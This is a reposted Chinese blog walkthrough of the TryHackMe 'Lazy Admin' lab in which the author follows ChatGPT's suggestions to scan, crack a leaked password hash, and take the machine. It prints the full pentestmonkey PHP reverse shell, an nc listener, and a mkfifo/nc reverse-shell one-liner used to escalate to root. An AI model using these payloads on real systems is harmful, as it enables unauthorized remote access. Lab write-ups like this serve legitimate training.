实战 | ChatGPT在渗透中的利用(转载)

转载自安全帮Liveive

ChatGPT如何帮助我们渗透。

使用chatGPT渗透tryhackme.com 上的一台linux 机器“ Lazy Admin ”。

假设我只会一些基础的黑客知识,这时我们可以问 ChatGPT 渗透的第一步应该做什么。

它告诉我们应该收集目标信息并通过执行网络扫描找到目标漏洞,还建议使用 nmap 。然后询问 ChatGPT 在 Linux 中 Nmap 扫描的用法。

这是目标的 IP ,尝试渗透。

我修改了语法运行得更快!扫描结果: 22 ,80 打开,尝试访问 80 端口。

80 上运行了Apache2 。

询问 ChatGPT 如何对web服务器进行渗透测试.

它告诉我们使用gobuster扫描目录

获取敏感目录

/content  (Status: 301) [Size: 316] [--> http://10.10.117.255/content/

获取 CMS 版本。使用 GoBuster再次扫描content目录。

发现了更多目录,

发现 SQL 备份目录并找到 .SQL 文件,在SQL文件里找到了password hash

然后询问 ChatGPT,我们应该如何利用这些password hash。

按照它说去做。使用 CrackStation 平台破解password hash。https://crackstation.net/

破解出密码为Password123 使用破解的密码登录网站后台。

用户名:manager  密码:Password123

在Ads section,可以添加一个脚本来获得反向连接 ,我提前准备了 Php 反向 shell 。询问ChatGPT ,php 反向 shell 脚本怎么使用 。

它给出了可以尝试使用 pentest monkey 。以下是 pentest monkey 的代码!

<?php

// php-reverse-shell - A Reverse Shell implementation in PHP

// Copyright (C) 2007 pentestmonkey@pentestmonkey.net

set_time_limit (0);

$VERSION = "1.0";

$ip = '10.10.14.35'; // You have changed this

$port = 4420; // And this

$chunk_size = 1400;

$write_a = null;

$error_a = null;

$shell = 'uname -a; w; id; /bin/sh -i';

$daemon = 0;

$debug = 0;

//

// Daemonise ourself if possible to avoid zombies later

//

// pcntl_fork is hardly ever available, but will allow us to daemonise

// our php process and avoid zombies. Worth a try...

if (function_exists('pcntl_fork')) {

// Fork and have the parent process exit

$pid = pcntl_fork();

if ($pid == -1) {

printit("ERROR: Can't fork");

exit(1);

}

if ($pid) {

exit(0); // Parent exits

}

// Make the current process a session leader

// Will only succeed if we forked

if (posix_setsid() == -1) {

printit("Error: Can't setsid()");

exit(1);

}

$daemon = 1;

} else {

printit("WARNING: Failed to daemonise. This is quite common and not fatal.");

}

// Change to a safe directory

chdir("/");

// Remove any umask we inherited

umask(0);

//

// Do the reverse shell...

//

// Open reverse connection

$sock = fsockopen($ip, $port, $errno, $errstr, 30);

if (!$sock) {

printit("$errstr ($errno)");

exit(1);

}

// Spawn shell process

$descriptorspec = array(

0 => array("pipe", "r"), // stdin is a pipe that the child will read from

1 => array("pipe", "w"), // stdout is a pipe that the child will write to

2 => array("pipe", "w") // stderr is a pipe that the child will write to

);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {

printit("ERROR: Can't spawn shell");

exit(1);

}

// Set everything to non-blocking

// Reason: Occsionally reads will block, even though stream_select tells us they won't

stream_set_blocking($pipes[0], 0);

stream_set_blocking($pipes[1], 0);

stream_set_blocking($pipes[2], 0);

stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {

// Check for end of TCP connection

if (feof($sock)) {

printit("ERROR: Shell connection terminated");

break;

}

// Check for end of STDOUT

if (feof($pipes[1])) {

printit("ERROR: Shell process terminated");

break;

}

// Wait until a command is end down $sock, or some

// command output is available on STDOUT or STDERR

$read_a = array($sock, $pipes[1], $pipes[2]);

$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

// If we can read from the TCP socket, send

// data to process's STDIN

if (in_array($sock, $read_a)) {

if ($debug) printit("SOCK READ");

$input = fread($sock, $chunk_size);

if ($debug) printit("SOCK: $input");

fwrite($pipes[0], $input);

}

// If we can read from the process's STDOUT

// send data down tcp connection

if (in_array($pipes[1], $read_a)) {

if ($debug) printit("STDOUT READ");

$input = fread($pipes[1], $chunk_size);

if ($debug) printit("STDOUT: $input");

fwrite($sock, $input);

}

// If we can read from the process's STDERR

// send data down tcp connection

if (in_array($pipes[2], $read_a)) {

if ($debug) printit("STDERR READ");

$input = fread($pipes[2], $chunk_size);

if ($debug) printit("STDERR: $input");

fwrite($sock, $input);

}

}

fclose($sock);

fclose($pipes[0]);

fclose($pipes[1]);

fclose($pipes[2]);

proc_close($process);

// Like print, but does nothing if we've daemonised ourself

// (I can't figure out how to redirect STDOUT like a proper daemon)

functionprintit ($string) {

if (!$daemon) {

print "$string

";

}

}

?>

复制代码到Ads section创建一个文件。不要忘记更改 IP 和端口。设置您的 tun0 IP 并将端口更改为 9001。

修改后

点击Done后,会在目录生成反弹php脚本 .如下所示。

使用nc监听,获取反弹shell。

 nc -lvnp 9001

访问revshell.php,就会建立连接!

进入主目获取 flag.txt

将此复制粘贴到此处,这台机器将被视为被黑。

接下来,我们需要进行权限提升并获取 root 。输入以下命令

python3 -c 'import pty;pty.spawn("/bin/bash")'

接下来,输入这个,再次将其更改为 tun0 IP。

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.39.120 443 >//tmp/f" > /etc/copy.sh

现在,在端口 443 上启动另一个监听,如下所示:

最后,执行最后一个命令,将获得root权限

sudo perl /home/itguy/backup.pl

成功获取权限

这是第一篇简单介绍如何使用 ChatGPT 渗透测试的文章。在不久的将来,我会写更多关于 ChatGPT 的渗透文章。

转载自安全帮Live,如有侵权请联系删除

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/13036.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

一文总结 Google I/O 2023

今日凌晨举行的谷歌 I / O 2023 开发者大会上&#xff0c;如果说和往年有什么不同&#xff0c;那么应该就是更大力度的 All in AI 。 毕竟在去年 I/O 宣布重点投入 AI 之后&#xff0c;年末却被 OpenAI 的 ChatGPT “越塔偷家”&#xff0c;匆忙攒出一个发布会还让 Bard 爆出事…

ChatGPT4 高分通过中国数据库系统工程师(DBA)认证

ChatGPT已经通过了美国MBA、法律和医学考试&#xff0c;ChatGPT又通过了中国数据库系统工程师考试。这次考试使用了2021年的真实试卷&#xff0c;上午的笔试题全部为选择题&#xff0c;总分75分&#xff08;45分通过&#xff09;。 ChatGPT3.5考了49分&#xff08;勉强通过&…

文心一言 VS chatgpt (4)-- 算法导论2.2 1~2题

一、用O记号表示函数(n ^ 3)/1000-100(n^2)-100n十3。 文心一言&#xff1a; chatgpt&#xff1a; 可以使用大 O 记号表示该函数的渐进复杂度&#xff0c;即&#xff1a; f ( n ) n 3 1000 − 100 n 2 − 100 n 13 O ( n 3 ) . f(n) \frac{n^3}{1000} - 100n^2 - 100n^{13…

ChatGPT内容创作工具

在当前信息化快速发展的时代&#xff0c;内容创作越来越成为具有重要商业价值的行业。AI&#xff08;人工智能&#xff09;内容创作工具因其独特的技术优势&#xff0c;正迅速崛起并受到广泛应用。基于ChatGPT大型语言模型和自然语言处理技术&#xff0c;AI内容创作工具具有先进…

腾讯类ChatGPT保密项目爆出,17级首席科学家-张正友带队研发

来源&#xff1a;机器之心 自 ChatGPT 爆火之后&#xff0c;国内众多科技大厂都纷纷跟进&#xff0c;宣布类 ChatGPT 产品研发计划。其中 2 月 9 日&#xff0c;腾讯表示在相关方向上已有布局&#xff0c;专项研究也在有序推进。 我们知道&#xff0c;腾讯在大模型领域的布局早…

杭州AIGC人才年薪320万/ 星舰爆炸后特斯拉大跌/ 苹果健康数据能用GPT分析了...今日更多新鲜事在此...

日报君 发自 凹非寺量子位 | 公众号 QbitAI 大家好&#xff0c;今天是4月21日星期五&#xff0c;记得周日也要上班哦~ 言归正传&#xff0c;来看看今天的科技圈资讯吧~ 星舰爆炸后特斯拉股价暴跌 昨日晚&#xff0c;美国太空探索技术公司&#xff08;SpaceX&#xff09;的巨型运…

研报精选230411

目录 【行业230411华安证券】智能家居行业深度&#xff1a;ChatGPT等大模型催化智能家居行业进一步发展 【行业230411信达证券】食品饮料行业2023年第12周周报&#xff1a;从当前时间点看今年液奶的投资机会 【行业230411东方财富证券】食品饮料行业专题研究&#xff1a;BC两端…

月薪过万!突破“创业失败+外卖小哥”标签,他这样从菜鸟晋升为程序员团队骨干~

何人年少不轻狂,一身疲惫一人扛。 只有走出学校的大门独自在社会上闯荡一番后才能够切身体会这句话的含义。 哪个少年没有志比天高的崇高的理想&#xff0c;然而现实却是命比纸薄的真实写照。 任何一个未正式踏入社会的青年面对未来都是充满激情的&#xff01;真正走向社会才…

从高速度到高质量,华为将引领数据中心产业走向何方?

数据中心产业正在从“高速度”到“高质量”&#xff0c;从过去的“唯需求论”逐渐迈向高效集约、绿色低碳、安全可靠的高质量发展道路。 出品 | 常言道 作者 | 丁常彦 进入2023年以来&#xff0c;以ChatGPT为代表的AIGC领域&#xff0c;成为人工智能最火的赛道&#xff0c;没有…

哈利波特!AI动画已经这么稳定了?MJ控制角色统一性5种技巧;百度大模型Prompt开发与应用新课上线;SD进阶万字长文 | ShowMeAI日报

&#x1f440;日报&周刊合集 | &#x1f3a1;生产力工具与行业应用大全 | &#x1f9e1; 点赞关注评论拜托啦&#xff01; &#x1f916; 哈利波特动画视频&#xff0c;使用 TemporalNet 制作 img2img 动画 这是 Reddit 论坛小伙伴分享的自制动画&#xff0c;内容选自哈利波…

东莞数字赋能峰会成功召开,实在智能为数智制造积极献策

大力发展数字经济&#xff0c;实现数字化转型是新一轮科技革命和产业变革的目标所在。东莞作为我国制造业大市&#xff0c;制造业占GDP比重稳定在50%左右的高位水平&#xff0c;目前已聚集超20万家工业企业、超1.2万家规上企业&#xff0c;对于数字化转型有着庞大的市场需求和潜…

人工智能(AI)如何帮助企业优化劳动力管理?

根据Gartner的研究&#xff0c;2023年将有60%的大型企业将实施数字化转型项目&#xff0c;以实现HCM管理自动化。到 2025 年&#xff0c;60% 的大型及中型企业将使用云部署的 HCM 套件进行行政和人才管理。 这意味着HR 对 AI 的好奇和关注度也在市场的热度中逐渐增强&#xff…

文心一言 新闻发布会 , 你怎么看这款产品?

文章目录 目录产品背景发展历程科技简介主要功能合作伙伴 结语 文心一言 &#xff08;英文名&#xff1a;ERNIE Bot&#xff09; *是百度基于文心大模型技术推出的生成式对话产品&#xff0c;被外界誉为“中国版ChatGPT”&#xff0c;将于2023年3月份面向公众开放。 [40] 百度…

盘点国内热门AI大模型

Chat-GPT问世以来&#xff0c;使得大模型一时间内火爆非凡。国内外各大科技公司也纷纷加入到大模型的研发行列中来&#xff0c;“百模之战”愈演愈烈&#xff0c;国内百度、阿里、华为等科技大厂陆续推出旗下大模型产品&#xff0c;新锐科技公司也不甘落后&#xff0c;目前不少…

谁在杀死 ChatGPT ?

作者| Mr.K 编辑| Emma 来源| 技术领导力(ID&#xff1a;jishulingdaoli) AI浪潮汹涌而来&#xff0c;离我们越来越近&#xff0c;有时候近到只差一个APP的距离。很多人把AI科技可能带来的全方位社会变革&#xff0c;称之为第四次科技革命&#xff0c;把ChatGPT称为“第四次科…

实在智能RPA受邀出席2023年东莞市数字赋能峰会,聚力数智制造

3月17日&#xff0c;“数字东莞 科创强市2023年东莞市数字赋能峰会”在松山湖光大We谷圆满举行。本次大会以创新性、专业性、平台化、战略性等为特色&#xff0c;涵盖当今前沿技术、行业痛点、商业模式。会上中国信通院的专家分享了《东莞市数字经济发展报告&#xff08;2022年…

系统重构实施,百亿级核心交易如何保证准确性?

重构&#xff1a;又喜欢又害怕 一个企业级的应用&#xff0c;即使是诸葛亮级别的设计人员&#xff0c;最初的考虑都不可能尽善尽美&#xff0c;会存在设计不够或者设计过头的情况。加上业务的发展可能与当初的推想不一致&#xff0c;这样就使得上线初期稳稳当当的一个系统&…

smart-mqtt v0.19最新版本实现消息重发规范,提升通讯可靠性

1、smart-mqtt 简介 smart-mqtt&#xff0c;是smartboot组织下面向物联网的首款解决方案&#xff0c;它使用Java语言开发&#xff0c;提供高效、可靠的MQTT Broker服务。 smart-mqtt的独特优势在于大量设备接入的情况下&#xff0c;仍能保持低延迟和高吞吐量&#xff0c;满足物…

社交泛娱乐出海如何抓住AIGC?我在融云WICC上看到了答案

大模型掀起的AIGC时代&#xff0c;所有企业的所有业务与产品都值得利用大模型技术重做一遍&#xff0c;接下来也将有越来越多依托AIGC技术的创新应用涌现。关注【融云全球互联网通信云】了解更多 在社交泛娱乐赛道&#xff0c;AI大模型技术也呈现出了加速落地的态势。日前&…

选型最佳实践|从业务场景分析直播SDK

摘要 近两年即时通讯/直播产品炙手可热&#xff0c;市场上针对ToB的产品日益增多&#xff0c;企业该如何去选型呢&#xff1f;本文分享了笔者对于直播产品的思考&#xff0c;将从直播SDK实例功能特性、常见业务场景、注意事项及最佳实践等方面介绍如何进行实例选型&#xff0c;…